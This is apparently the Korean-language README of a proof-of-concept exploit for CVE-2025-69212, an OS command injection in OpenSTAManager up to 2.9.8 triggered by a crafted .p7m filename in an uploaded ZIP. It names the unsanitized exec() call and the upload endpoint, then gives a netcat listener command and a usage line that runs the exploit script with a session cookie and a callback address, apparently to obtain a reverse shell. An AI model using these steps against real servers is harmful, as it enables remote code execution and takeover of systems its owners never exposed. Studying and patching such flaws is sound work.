
CVE-2025-69212에 대한 개념 증명 익스플로잇: ZIP 업로드 시 악성 .p7m 파일명을 통한 OpenSTAManager <= 2.9.8의 OS 명령 주입으로, 원격 코드 실행을 가능하게 합니다.
OpenSTAManager <= 2.9.8 — 악성 .p7m 파일명을 통한 ZIP 업로드 OS 명령 주입
파일: src/Util/XML.php:100 — exec()에서 비정화된 $file
벡터: /plugins/importFE_ZIP/actions.php → ZIP → .p7m 파일명 → exec("openssl smime ... -in \"$file\" ...")
# 리스너
nc -lvnp 4444
# 익스플로잇
python3 CVE-2025-69212.py http://target.htb YOUR_PHPSESSID 10.10.14.X 4444